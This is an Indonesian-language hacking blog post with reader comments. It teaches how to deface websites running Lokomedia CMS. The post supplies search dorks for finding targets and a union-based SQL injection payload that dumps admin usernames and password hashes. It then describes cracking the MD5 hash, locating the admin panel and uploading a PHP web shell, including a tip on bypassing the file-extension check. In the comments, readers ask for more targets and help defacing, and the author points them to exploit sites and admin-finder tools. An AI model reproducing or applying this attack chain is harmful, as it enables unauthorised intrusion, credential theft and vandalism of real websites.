Wednesday, 29 June 2016

Tutorial Deface dengan SQL Lokomedia


Hello World ; Siang Fans, Please Say Hello Haters :*
xixixhi, maap yo baru update artikel, Lanjut Walking Blog geenggs, pade masihh kuat kan puasanyee ampe bedug maghrib akwkwak :D
yoks, kali ini Gue akan ngebahas salah Satu Bug/Celah yg ada pada CMS Lokomedia nih, kite suntik2an dlu, *jekinjectbumi akwkwak :p *ini tutor lama sih >.< *share aja, kali aja masih crotz
Langsung aje Tutorial SQL Injection on Lokomedia CMS .


Langsung intip tutor ;*

Dork : - inurl:kategori-23-hiburan.html
           - inurl:hal-tentang-kami.html
           - inurl:statis-1-pengantar.html
           - inurl:statis-19-beasiswa.html
           - inurl:statis-22-kerjasama.html
(kembangin lagi gunakan otak bokepers Lu, biar dpt yg Vuln and Verawan gengs ;*)

eXploit : 'union select /*!50000Concat*/(username,0x20,password)+from+users--+--+

1. Dorking menggunakan Search Engine

2. Pilih web target, Lalu masukan eXploitnya.
di target saya menjadi seperti ini: target.c0li/statis--7'union%20select%20/*!50000Concat*/(username,0x20,password)+from+users--+--+kantordesa.html

silahkan oprek2 sendiri Query yg pas utk Target agan


Sekarang sudah kelihatan user sama passwordnya di bagian title. 
kemudian ctrl+u untuk melihatnya lebih jelas.



Terlihat User : joko dan Pasword : 21232f297a57a5a743894a0e4a801fc3 , karena password masih dalam bentuk MD5 maka harus di decrypt, saya menggunakan HashKiller, dan setelah didecrypt hasilnya adalah password: admin.
Kalean bisa gunakan web atau aplikasi laen utk ngeDecrypt MD5 ini.



Untuk login biasanya di :
www.target.c0li/admin
www.target.c0li/adminweb
www.target.c0li/administrator
- www.target.c0li/redaktur
Kali ini loginnya berada di target.c0li/adminweb/
, Kemudian masukan user dan pass di form. Dan hasilnya seperti ini



Untuk mengupload shell bisa dibagian Download, seperti ini


Untuk mengakses shell biasanya di target.c0li/files/namashellLu
*Shell harus berekstensi .phtml *atao coba bypass ekstensi ke yg laen :3

eh sebelumnya add OA Line Kami yoo, kami bagi2in Tema Official TKJ Cyber Art loh: http://line.me/ti/p/%40hjl8740i
dah ah, gue mauu Bobo Ganteng dluu -> terus bangun pas Bedug awkkwa

Mudahkan x_O ?
Stay Cool and Keep ./Crotz , gaes <(")

bila ada kesalahan mohon di maafkan dan dibenarkan di kolom komentar kak. 
bila ada kritik, dan pertanyaan langsung aja kak ke wall fanspage kami: TKJ CYBER ART
Nue cuma niat untuk Share Tutorial, yg bertujuan utk membantu para pemula kek Nue :')
Salam Suntikan Gengs :3
Sekian dan semoga bermanfaat .. terimakasih


Source and Thanks to: Bocah Berisik


./Nuenomaru


Awali Hari Lu dengan Secangkir Caffeine, dan Sentuhan Nikotin :)





Visit and follow :

FP         : TKJ Cyber Art
G+         : TKJ Cyber Art
youtube : TKJ Cyber Art
BBM      : C0018D1A2
Line       : http://line.me/ti/p/%40hjl8740i

27 comments

nganu mbah, makasih buat TKJ Cyber Art dan Blognya
saya sering pakai tutorialnya terus saya riset ualng dan saya ketik di blog http://garudasecurityhacker.blogspot.com

terus makasih juga buat motivasi gambar2 nya :)

maaf saya gak izin buat riset ulang tutor nya :(

Hahahha :* , santayyy bang :) .. Artikel kamii juga hasil riset ulang dri tutorial di web exploit dan web2 master tetangga kok :D .. Hahha yupzz gapapa kok gan ga izin , yg penting ss di artikel Hasill Live praktek agan sendiri ^_^ .. Kamii baakall terus support karya lu bang :) .. Haha tengkyu juga dah pantengin ini Blog . Dan yoii ambil kata2 positifnya aje di setiap tutor kamii . Yg berbau bokep di buang aje wkwkkw.. Salam sukses yo bang

kata-kata berbau vokep mah, buat penyegar aja bang, :D
biar kaga garing postingan nya :)
semangat juga bang bikin artikel selanjutnya



Salam Juga Dari Keluarga Kecil Garuda Security Hacker :)

Hahaha Sipp Bang :D

#Nuenomaru

Ajarin Gw Dong GAN masih New Bie nih :D

Gw Pusing Banget , Beljar Daface Ga Bisa" :'(

Para Mastah Yg Mau Berbagi Ilmu , Tlong Ajarin adik ini NgeDaface ,... Klo Mau Chat DiBBM :D12EA71F

Kami juge masih Belajar kok bang ..

#Nuenomaru

dah banyak exploit deface ada di web 0day dan exploit-DB, silahkan berkunjung dan pelajari disana.
jika ingin liat video exploitnye silahkan kunjungi youtube, kami juga masih belaajar , gak pantes menggurui..

#Nuenomaru

6ea092ee7f25229eb4aebabec9edff2cdc5e248440610594c493deaeb43a77226b8b9a539a043766c4cc9c851309c2bd04e6d8f86941d3ac99fd292ab5e76f80 itu artinya apa mastah :v

bang cara cari admin login nya gimana,selain di adminweb/ apa lagi bang soal nya saya cari di adminweb ga nemu malah error terus?

itu kode hash om, utk tau itu kode hash macam apa, silahkan cek artikel kami yg judulnya identifakasi hash..
atau silahkan encrypt and decrypt online di website hashkiller.

#Nuenomaru

silahkan cari tau tentang tool admin finder..

#Nuenomaru

Gan saya izin untuk copas artikel ente ya gan...terima kasih artikel nya bermanfaat... =. 404cybercrime.blogspot.com

seep , silahkan om..
tengkyuh juga dah berkunjung :)

#Nuenomaru

maztah koq sayah gagal login yah di cpanelnya padahal caranya sama kayagitu

emg user n pwnya sama kek utk login admin o.O ?
#Nuenomaru

tkj cyber salam dari LCT & C0w0k t3rs4k1t1 t3am

sama minta dork donk gw ga bs ngembangin dork

akwkakwakkw >.< :v :v
iya ya deh,, salam balik juga yoo bang heheh

#Nuenomaru

maap bang :)
kami juga dah gak pernah maen lg,,gak ada dork fresh kami.

#Nuenomaru

bagai mana mbah cari admin ne ra iso

pakai tool aja om..
tool admin finder dah banyak kok yg ngembangin..
#Nuenomaru

izin copas ea..
www.ajay-alfredo.blogspot.com


EmoticonEmoticon